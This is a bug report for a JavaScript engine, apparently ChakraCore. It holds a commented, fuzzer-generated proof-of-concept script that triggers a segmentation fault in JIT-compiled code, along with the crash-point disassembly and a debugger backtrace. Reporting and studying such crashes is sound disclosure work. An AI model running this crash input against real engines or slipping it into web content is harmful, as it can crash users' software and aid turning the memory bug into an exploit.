
Segmentation fault #6643

bird8693 opened this issue Mar 17, 2021 · 0 comments


environment

ubuntu 16

poc

/**
 * Fuzzer-style entry point of the reproducer. Nothing in this listing ever
 * calls main(), and `opt` is not defined anywhere on the page, so invoking it
 * as written would throw a ReferenceError on the first loop iteration; this
 * function is presumably generator leftover and not part of the crash path
 * (TODO confirm against the original test case).
 */
function main() {
    // Constant comparison (always true); the result is never read.
    var HWyR = 268435456 <= 9007199254740991;
    // Shadows the script-level `arr` declared further down; never read.
    let arr = [
        1.1,
        2.2,
        3.3
    ];
    // 65536 calls of a function that does not exist in this listing; looks
    // like warm-up filler from the generator.
    for (let i = 0; i < 65536; i++) {
        opt();
    }
    // Installs an accessor `x` on Array.prototype whose getter is
    // Object.prototype.valueOf, i.e. `anyArray.x` evaluates to the array
    // itself (valueOf returns its receiver).
    Array.prototype.__defineGetter__('x', Object.prototype.valueOf);
    // Never read.
    var aKGJ = Symbol;
    // `print` is not defined on the page; presumably a host-shell builtin.
    print(opt());
}
// Top-level body of the reproducer -- the part the host actually executes
// (main() above is never called). The script is sloppy-mode code: it relies on
// `var` hoisting, on assignment to the undeclared global `once`, and on
// property writes to primitives being silently dropped. Statement order and
// the exact loop shapes are the reproducer itself; the crash stack on the page
// shows anonymous frames, consistent with JIT-compiled code, so the trigger
// presumably depends on which code gets compiled and when (TODO confirm).
var r = new Object();
var r = new Object();
// 100000 iterations whose body has no observable effect; presumably loop
// warm-up for the engine's optimizing tiers -- verify.
for (var ijjkkk = 0; ijjkkk < 100000; ++ijjkkk) {
    var nrYB = Symbol;
}
let arr = [];
// NOTE(review): if the host shell exposes a builtin named CollectGarbage,
// this `var` shadows it with a plain object for the rest of the script.
var CollectGarbage = new Object();
var r = new Object();
// `vars` is hoisted but not yet assigned (see the next line), so this is
// `undefined >= {}`, which is false; Mchh is the boolean false.
var Mchh = vars >= r;
var vars = [];
var r = new Object();
// The argument is coerced to the string "null", which parses to null;
// the result is discarded.
JSON.parse(null);
// `once` is never declared: implicit global (sloppy mode).
once = CollectGarbage != 1.3;
// 2^53 + 2 and -(2^53 - 1) (= -Number.MAX_SAFE_INTEGER); both unused.
var ThnA = +9007199254740994;
var PHrh = -9007199254740991;
once = true;
var Jknd = Date;
var r = new Object();
var YQZc = +0.1;
var CollectGarbage = new Object();
// At this point `i` exists only as a hoisted `var` (declared by the loops
// below) and is still undefined, so `undefined < 20000` is false and this
// loop body never runs; only the Uint32Array initializer executes.
for (var Rjsi = new Uint32Array([1200]); i < 20000; i++) {
    vars[-1] = 'aaaaa';
}
var r = new Object();
// Plain data property on an ordinary object (r is not a RegExp here).
r.lastIndex = 'aaaaa';
once = CollectGarbage != 1.3;
r.lastIndex = 'aaaaa';
// The two inner loops reuse the same `var i` and leave it at 40000, so this
// outer loop body executes exactly once.
for (var i = 20000; i < 40000; i++) {
    vars[vars.length] = 'aaaaa';
    var xxKn = 3.141592653589793 * 1e-81;
    for (var i = 20000; i < 40000; i++) {
        // Only the first iteration writes into the array: `vars = !NaN`
        // below replaces it with the boolean true, and property writes on a
        // primitive are silently dropped in sloppy mode.
        vars[i] = ' \'\' ';
        // Both operands are plain objects, so ToNumber gives NaN; unused.
        var JfHf = CollectGarbage ** r + 1073741825;
        vars = !NaN;
        // Writes the length of Array.prototype (an Array exotic object) on
        // every iteration.
        Array.prototype.length = 0;
    }
    for (var i = 20000; i < 40000; i++) {
        // 20000 x 100000 no-op iterations: the bulk of the run time,
        // presumably to get the enclosing loop JIT-compiled -- verify.
        for (var ijjkkk = 0; ijjkkk < 100000; ++ijjkkk) {
            var Jknd = Date;
        }
        // Mchh is the boolean false (see its definition above), so this
        // yields false.
        once = Mchh.valueOf();
        var HWyR = 268435456 <= 9007199254740991;
        var dmdd = CollectGarbage % 1200;
        var dmdd = CollectGarbage % 1200;
        vars[-1] = 'aaaaa';
        var CollectGarbage = new Object();
        // (2^31 + 1) - (2^32 + 1) = -2147483648, i.e. INT32_MIN; unused.
        var SSsr = 2147483649 + -4294967297;
        var Rjsi = new Uint32Array([1200]);
        once = Mchh.valueOf();
        // The global NaN is non-configurable, so `delete` yields false here.
        var cJjF = delete NaN;
        var nmMt = new Set([3.141592653589793]);
        // null is stringified: equivalent to /null/.
        var chhy = new RegExp(null);
        var dmdd = CollectGarbage % 1200;
        var RjjJ = -1;
        once = CollectGarbage != 1.3;
        var winE = Promise;
    }
    var dmdd = CollectGarbage % 1200;
    vars[-1] = 'aaaaa';
    once = Mchh.valueOf();
    vars[vars.length] = 'aaaaa';
    var r = new Object();
    var nmMt = new Set([3.141592653589793]);
    // vars is the boolean true by now, so this is `true >= {}`, a comparison
    // against NaN, and Mchh is false again.
    var Mchh = vars >= r;
}
var dmdd = CollectGarbage % 1200;
var sRcZ = Proxy;

output

command line output

Segmentation fault (core dumped)

crash point

   0x7ff7f2f932de                  push   0x48ca8b48
   0x7ff7f2f932e3                  shr    ecx, 0x30
   0x7ff7f2f932e6                  jne    0x7ff7f2f93cc9
 → 0x7ff7f2f932ec                  mov    rcx, QWORD PTR [rdx+0x8]
   0x7ff7f2f932f0                  xor    edi, edi
   0x7ff7f2f932f2                  cmp    rcx, QWORD PTR [r13+0x480]
   0x7ff7f2f932f9                  jne    0x7ff7f2f93ce5
   0x7ff7f2f932ff                  cmovne rdx, rdi
   0x7ff7f2f93303                  mov    rdi, QWORD PTR [r15+0x4d0dc]

callstack

gef➤ bt
#0 0x00007ff7f2f932ec in ?? ()
#1 0x0000555500000002 in ?? ()
#2 0x00007ff7f2f1f480 in ?? ()
#3 0x00005555573d9d20 in LegalInstrFormsImpl::LEGAL_N_R_R ()
#4 0x00007ffff695b53c in __GI___libc_free (mem=) at malloc.c:2968
#5 0x00007fffffffd220 in ?? ()
#6 0x00007ffff7fc37a8 in ?? ()
#7 0x0000000000000000 in ?? ()
